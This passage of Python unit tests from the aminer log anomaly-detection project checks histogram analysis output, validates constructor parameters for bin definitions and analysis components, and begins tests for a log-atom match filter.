+ diff, pdha) pdha.receive_atom(log_atom_start) pdha.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 666200\n Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)') + expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 662600\n Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)')) self.reset_output_stream() t2 = t1 + diff start_time += 3600 end_time += 3600 log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t2, pdha) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t2 + diff, pdha) pdha.receive_atom(log_atom_start) pdha.receive_atom(log_atom_end) dtm = datetime.fromtimestamp(t2).strftime(datetime_format_string) dtm2 = datetime.fromtimestamp(t2 + diff).strftime(datetime_format_string) self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 4, dtm, dtm2, 'Path values "match":\nExample: 666200\n Property "match" (4 elements):\n * [16-17]: 3 (ratio = 7.50e-01, p = 2.80e-04)\n * [17-18]: 1 (ratio = 2.50e-01, p = 1.57e-01)')) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, LinearNumericBinDefinition, "0", 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, b"0", 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, [0], 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, {0: 0}, 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, set(), 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, True, 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, (0,), 1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, None, 1, 1, True) self.assertRaises(ValueError, LinearNumericBinDefinition, 1, -1, 1, True) self.assertRaises(ValueError, LinearNumericBinDefinition, 1, 0, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1.1, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, True, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, "1", 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, b"1", 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, [1], 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, {1: 1}, 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, set(), 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, (1,), 1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, None, 1, True) self.assertRaises(ValueError, LinearNumericBinDefinition, 1, 1, -1, True) self.assertRaises(ValueError, LinearNumericBinDefinition, 1, 1, 0, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1.1, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, True, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, "1", True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, b"1", True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, [1], True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, {1: 1}, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, set(), True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, (1,), True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, None, True) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, 1) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, 1.1) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, "1") self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, b"1") self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, [1]) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, {1: 1}) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, set()) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, (1,)) self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, None) LinearNumericBinDefinition(-100, 1, 1, True) lnbd = LinearNumericBinDefinition(0, 1, 1, False) LinearNumericBinDefinition(100, 1, 1, False) LinearNumericBinDefinition(100.3, 1, 1, False) self.assertRaises(ValueError, ModuloTimeBinDefinition, 0, 3600, 1, 1, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, -1, 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, True, 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, "1", 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, b"1", 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, [1], 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, {1: 1}, 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, set(), 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, (1,), 3600, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, None, 3600, 1, 1, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 0, 1, 1, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, -1, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 1.1, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, True, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, "1", 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, b"1", 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, [1], 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, {1: 1}, 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, set(), 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, (1,), 1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, None, 1, 1, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, -1, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, "0", 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, b"0", 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, [0], 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, {0: 0}, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, set(), 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, True, 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, (0,), 1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, None, 1, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, -1, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, 0, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1.1, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, True, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, "1", 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, b"1", 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, [1], 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, {1: 1}, 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, set(), 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, (1,), 1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, None, 1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, -1, True) self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 0, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1.1, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, True, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, "1", True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, b"1", True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, [1], True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, {1: 1}, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, set(), True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, (1,), True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, None, True) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, 1) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, 1.1) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, "1") self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, b"1") self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, [1]) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, {1: 1}) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, set()) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, (1,)) self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, None) ModuloTimeBinDefinition(0.1, 1, 0, 1, 1, True) mtbd = ModuloTimeBinDefinition(86400, 3600, 100, 1, 1, False) ModuloTimeBinDefinition(86400, 3600, 100.3, 1, 1, False) self.assertRaises(ValueError, HistogramData, "", mtbd) self.assertRaises(TypeError, HistogramData, None, mtbd) self.assertRaises(TypeError, HistogramData, 1, mtbd) self.assertRaises(TypeError, HistogramData, 1.1, mtbd) self.assertRaises(TypeError, HistogramData, True, mtbd) self.assertRaises(TypeError, HistogramData, b"match", mtbd) self.assertRaises(TypeError, HistogramData, [1], mtbd) self.assertRaises(TypeError, HistogramData, {1: 1}, mtbd) self.assertRaises(TypeError, HistogramData, set(), mtbd) self.assertRaises(TypeError, HistogramData, (1,), mtbd) self.assertRaises(TypeError, HistogramData, "match", None) self.assertRaises(TypeError, HistogramData, "match", 1) self.assertRaises(TypeError, HistogramData, "match", 1.1) self.assertRaises(TypeError, HistogramData, "match", True) self.assertRaises(TypeError, HistogramData, "match", b"match") self.assertRaises(TypeError, HistogramData, "match", [1]) self.assertRaises(TypeError, HistogramData, "match", {1: 1}) self.assertRaises(TypeError, HistogramData, "match", set()) self.assertRaises(TypeError, HistogramData, "match", (1,)) HistogramData("match", mtbd) HistogramData("match", lnbd) defs = [("path", mtbd)] self.assertRaises(ValueError, HistogramAnalysis, self.aminer_config, [], 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, [("path", "path")], 100, [self.stream_printer_event_handler]) self.assertRaises(ValueError, HistogramAnalysis, self.aminer_config, [("", mtbd)], 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, ["default"], 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, b"Default", 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, True, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, 123, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, 123.3, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, {"id": "Default"}, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, (), 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, set(), 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, None, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100.1, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, ["default"]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, None) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, "") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, b"Default") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, True) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, 123) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, 123.3) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, {"id": "Default"}) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, ()) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, set()) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=["default"]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=None) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag="") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=b"Default") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=123) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=123.3) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag={"id": "Default"}) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=()) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=set()) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=["default"]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline="") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=b"Default") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=123.3) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=set()) self.assertRaises(ValueError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=set()) HistogramAnalysis(self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) self.assertRaises(ValueError, PathDependentHistogramAnalysis, self.aminer_config, "", mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, b"path", mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, ["default"], mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, b"Default", mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, True, mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, 123, mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, 123.3, mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, {"id": "Default"}, mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, (), mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, set(), mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, None, mtbd, 100, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", [mtbd], ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", b"path", ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", "", ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", True, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", 123.3, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", {"id": "Default"}, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", (), ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", set(), ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", None, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100.1, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, ["default"]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, None) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, "") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, b"Default") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, True) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, 123) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, 123.3) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, {"id": "Default"}) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, ()) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, set()) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=["default"]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=None) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag="") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=b"Default") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=123) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=123.3) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag={"id": "Default"}) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=()) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], reset_after_report_flag=set()) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=["default"]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline="") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=b"Default") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=123.3) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], output_logline=set()) self.assertRaises(ValueError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=set()) PathDependentHistogramAnalysis(self.aminer_config, "path", mtbd, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MatchFilterTest.py000066400000000000000000000223011500476301700272150ustar00rootroot00000000000000import unittest import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement from aminer.analysis.MatchFilter import MatchFilter from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from datetime import datetime class MatchFilterTest(TestBase): """Unittests for the MatchFilter.""" def test1receive_atom(self): """Test if log atoms are processed correctly.""" fmme = DummyFirstMatchModelElement("first", [DummyFixedDataModelElement(f"s{i}", f"val{i}".encode()) for i in range(10)]) match_filter = MatchFilter(self.aminer_config, [f"/first/s{i}" for i in range(10)], [self.stream_printer_event_handler]) t = time.time() expected_string = '%s Log Atom Filtered\nMatchFilter: "None" (1 lines)\n val%d\n\n' # check if an event is triggered if the path is in the target_path_list. for val in range(10): val_str = f"val{val}".encode() log_atom = LogAtom(val_str, ParserMatch(fmme.get_match_element("", DummyMatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) self.assertEqual(expected_string % (datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), val), self.output_stream.getvalue()) self.reset_output_stream() # check if an event is not triggered if the path is not in the target_path_list. match_filter.target_path_list = ["/strings"] for val in range(10): val_str = f"val{val}".encode() log_atom = LogAtom(val_str, ParserMatch(fmme.get_match_element("", DummyMatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) self.assertEqual("", self.output_stream.getvalue()) # check if an event is triggered, when the path is in the target_path_list and the value is in the target_value_list. match_filter.target_path_list = [f"/first/s{i}" for i in range(10)] match_filter.target_value_list = [f"val{i}" for i in range(10)] for val in range(10): val_str = f"val{val}".encode() log_atom = LogAtom(val_str, ParserMatch(fmme.get_match_element("", DummyMatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) self.assertEqual(expected_string % (datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), val), self.output_stream.getvalue()) self.reset_output_stream() # check if an event is not triggered when the path is in the target_path_list and the value is not in the target_value_list. match_filter.target_value_list = [f"val{i}" for i in range(6)] for val in range(10): val_str = f"val{val}".encode() log_atom = LogAtom(val_str, ParserMatch(fmme.get_match_element("", DummyMatchContext(val_str))), t, match_filter) match_filter.receive_atom(log_atom) if val <= 5: self.assertEqual(expected_string % (datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), val), self.output_stream.getvalue()) else: self.assertEqual("", self.output_stream.getvalue()) self.reset_output_stream() def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, MatchFilter, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, 